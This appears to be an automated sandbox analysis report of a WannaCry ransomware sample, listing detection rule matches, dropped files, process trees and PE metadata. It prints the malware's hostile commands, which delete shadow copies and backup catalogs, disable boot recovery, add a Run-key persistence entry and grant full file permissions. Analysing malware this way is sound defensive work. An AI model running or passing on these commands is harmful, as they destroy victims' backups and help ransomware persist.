Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware

Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

Code function: String function: 00EE6562 appears 35 times

Source: Wannacry.exe	Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskdl.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: Wannacry.exe, 00000000.00000003.2127650555.0000000000802000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs Wannacry.exe
Source: Wannacry.exe, 00000000.00000003.829119373.0000000002593000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs Wannacry.exe
Source: Wannacry.exe, 00000000.00000003.848497025.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs Wannacry.exe
Source: Wannacry.exe, 00000000.00000003.2011922304.0000000000802000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs Wannacry.exe
Source: Wannacry.exe, 00000000.00000003.855455019.00000000007D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs Wannacry.exe
Source: Wannacry.exe, 00000000.00000003.841956217.00000000007CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs Wannacry.exe
Source: Wannacry.exe, 00000000.00000003.1362189646.00000000007F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs Wannacry.exe
Source: Wannacry.exe, 00000000.00000003.829032378.00000000025A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs Wannacry.exe
Source: Wannacry.exe, 00000000.00000003.2010730954.0000000000801000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs Wannacry.exe
Source: Wannacry.exe	Binary or memory string: OriginalFilenamediskpart.exej% vs Wannacry.exe

Source: Wannacry.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\taskdl.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_6-217

Source: C:\Users\user\Desktop\Wannacry.exe

File created: C:\Users\user\Desktop\b.wnry

Jump to behavior

Source: classification engine

Classification label: mal100.rans.spyw.evad.winEXE@37/690@0/11

Source: C:\Windows\SysWOW64\cscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs

Source: Wannacry.exe, 00000000.00000003.2127650555.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.848497025.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.2011922304.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.855455019.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.841956217.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.1362189646.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.2010730954.0000000000801000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001B.00000000.2015355782.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Source: Wannacry.exe	Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll

Source: C:\Users\user\Desktop\Wannacry.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 312151692193723.bat

Source: Wannacry.exe	ReversingLabs: Detection: 92%
Source: Wannacry.exe	Virustotal: Detection: 94%

Source: C:\Windows\SysWOW64\icacls.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Wannacry.exe C:\Users\user\Desktop\Wannacry.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\Windows\SysWOW64\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 312151692193723.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "uqcbeegnpjpsq661" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "uqcbeegnpjpsq661" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
Source: C:\Users\user\Desktop\Wannacry.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "uqcbeegnpjpsq661" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior

Source: C:\Windows\SysWOW64\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Wannacry.exe

File created: C:\Documents and Settings\All Users\Adobe\Temp\~SD716E.tmp

Jump to behavior

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 27_2_00403A20 GetLogicalDrives,GetDriveTypeW,GetDriveTypeW,GetDiskFreeSpaceExW,

27_2_00403A20

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8720:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3580:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8796:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8956:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8796:120:WilError_03

Source: taskhsvc.exe	String found in binary or memory: /home/ubuntu/install/mingw-w64/i686-w64-mingw32/include
Source: taskhsvc.exe	String found in binary or memory: /home/ubuntu/install/mingw-w64/i686-w64-mingw32/include/psdk_inc

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Window found: window name: RICHEDIT

Jump to behavior

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

File opened: C:\Windows\SysWOW64\RICHED32.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Wannacry.exe

Static file information: File size 3514368 > 1048576

Source: Wannacry.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a000

Source:	Binary string: tC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\excel.exe.db_prod.pdbllRegexta\Applicao=,i source: Wannacry.exe, 00000000.00000003.1997759022.0000000003C33000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\iconcache_256.dbs\ntkrnlmp.pdbwekyb3d8bbwewe source: Wannacry.exe, 00000000.00000003.1997759022.0000000003C33000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00413060 push eax; ret		27_2_0041308E
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00413060 push eax; ret		30_2_0041308E

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 27_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,

27_2_00404B70

Source: libeay32.dll.27.dr	Static PE information: section name: /4
Source: libeay32.dll.27.dr	Static PE information: section name: /19
Source: libeay32.dll.27.dr	Static PE information: section name: /31
Source: libeay32.dll.27.dr	Static PE information: section name: /45
Source: libeay32.dll.27.dr	Static PE information: section name: /57
Source: libeay32.dll.27.dr	Static PE information: section name: /70
Source: libeay32.dll.27.dr	Static PE information: section name: /81
Source: libeay32.dll.27.dr	Static PE information: section name: /92
Source: libevent-2-0-5.dll.27.dr	Static PE information: section name: /4
Source: libevent-2-0-5.dll.27.dr	Static PE information: section name: /19
Source: libevent-2-0-5.dll.27.dr	Static PE information: section name: /31
Source: libevent-2-0-5.dll.27.dr	Static PE information: section name: /45
Source: libevent-2-0-5.dll.27.dr	Static PE information: section name: /57
Source: libevent-2-0-5.dll.27.dr	Static PE information: section name: /70
Source: libevent-2-0-5.dll.27.dr	Static PE information: section name: /81
Source: libevent-2-0-5.dll.27.dr	Static PE information: section name: /92
Source: libevent_core-2-0-5.dll.27.dr	Static PE information: section name: /4
Source: libevent_core-2-0-5.dll.27.dr	Static PE information: section name: /19
Source: libevent_core-2-0-5.dll.27.dr	Static PE information: section name: /31
Source: libevent_core-2-0-5.dll.27.dr	Static PE information: section name: /45
Source: libevent_core-2-0-5.dll.27.dr	Static PE information: section name: /57
Source: libevent_core-2-0-5.dll.27.dr	Static PE information: section name: /70
Source: libevent_core-2-0-5.dll.27.dr	Static PE information: section name: /81
Source: libevent_core-2-0-5.dll.27.dr	Static PE information: section name: /92
Source: libevent_extra-2-0-5.dll.27.dr	Static PE information: section name: /4
Source: libevent_extra-2-0-5.dll.27.dr	Static PE information: section name: /19
Source: libevent_extra-2-0-5.dll.27.dr	Static PE information: section name: /31
Source: libevent_extra-2-0-5.dll.27.dr	Static PE information: section name: /45
Source: libevent_extra-2-0-5.dll.27.dr	Static PE information: section name: /57
Source: libevent_extra-2-0-5.dll.27.dr	Static PE information: section name: /70
Source: libevent_extra-2-0-5.dll.27.dr	Static PE information: section name: /81
Source: libevent_extra-2-0-5.dll.27.dr	Static PE information: section name: /92
Source: libgcc_s_sjlj-1.dll.27.dr	Static PE information: section name: /4
Source: libgcc_s_sjlj-1.dll.27.dr	Static PE information: section name: /19
Source: libgcc_s_sjlj-1.dll.27.dr	Static PE information: section name: /31
Source: libgcc_s_sjlj-1.dll.27.dr	Static PE information: section name: /45
Source: libgcc_s_sjlj-1.dll.27.dr	Static PE information: section name: /57
Source: libgcc_s_sjlj-1.dll.27.dr	Static PE information: section name: /70
Source: libgcc_s_sjlj-1.dll.27.dr	Static PE information: section name: /81
Source: libgcc_s_sjlj-1.dll.27.dr	Static PE information: section name: /92
Source: libssp-0.dll.27.dr	Static PE information: section name: /4
Source: libssp-0.dll.27.dr	Static PE information: section name: /19
Source: libssp-0.dll.27.dr	Static PE information: section name: /31
Source: libssp-0.dll.27.dr	Static PE information: section name: /45
Source: libssp-0.dll.27.dr	Static PE information: section name: /57
Source: libssp-0.dll.27.dr	Static PE information: section name: /70
Source: libssp-0.dll.27.dr	Static PE information: section name: /81
Source: libssp-0.dll.27.dr	Static PE information: section name: /92
Source: ssleay32.dll.27.dr	Static PE information: section name: /4
Source: ssleay32.dll.27.dr	Static PE information: section name: /19
Source: ssleay32.dll.27.dr	Static PE information: section name: /31
Source: ssleay32.dll.27.dr	Static PE information: section name: /45
Source: ssleay32.dll.27.dr	Static PE information: section name: /57
Source: ssleay32.dll.27.dr	Static PE information: section name: /70
Source: ssleay32.dll.27.dr	Static PE information: section name: /81
Source: ssleay32.dll.27.dr	Static PE information: section name: /92

Persistence and Installation Behavior

Uses bcdedit to modify the Windows boot settings

